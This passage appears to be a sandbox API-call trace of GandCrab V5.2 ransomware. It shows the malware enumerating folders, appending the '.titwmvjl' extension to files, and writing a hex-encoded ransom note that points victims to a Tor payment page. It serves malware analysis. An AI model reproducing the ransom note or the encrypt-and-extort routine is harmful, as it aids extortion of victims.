1\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0073.954] WriteFile (in: hFile=0x2d4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e590, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e590*=0x2162, lpOverlapped=0x0) returned 1 [0073.955] CloseHandle (hObject=0x2d4) returned 1 [0073.955] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.955] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.956] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x13, wMilliseconds=0x106)) [0073.956] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.956] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0073.956] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0073.957] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\d2ca4a09d2ca4deb61a.lock") returned 105 [0073.957] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2d4 [0073.958] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.958] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.958] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\") returned 81 [0073.958] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*" [0073.958] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*", fInfoLevelId=0x1, lpFindFileData=0x259e5ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e5ac) returned 0x503578 [0073.959] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.959] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0073.959] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.959] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.959] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0073.959] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0073.959] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0073.959] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\d2ca4a09d2ca4deb61a.lock" [0073.959] lstrlenW (lpString=".titwmvjl") returned 9 [0073.959] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\d2ca4a09d2ca4deb61a.lock") returned 105 [0073.959] VirtualAlloc (lpAddress=0x0, dwSize=0x112, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.959] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 114 [0073.960] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\d2ca4a09d2ca4deb61a.lock") returned 105 [0073.960] lstrlenW (lpString=".lock") returned 5 [0073.960] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.960] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0073.960] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.960] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.960] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0073.960] lstrcmpW (lpString1="Document Themes", lpString2=".") returned 1 [0073.960] lstrcmpW (lpString1="Document Themes", lpString2="..") returned 1 [0073.960] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\", lpString2="Document Themes" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes" [0073.960] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\" [0073.960] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0073.961] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.961] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0073.961] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.961] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0073.961] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.961] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0073.961] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.961] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0073.961] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.961] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.962] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\\\TITWMVJL-DECRYPT.txt") returned 118 [0073.962] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0073.963] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\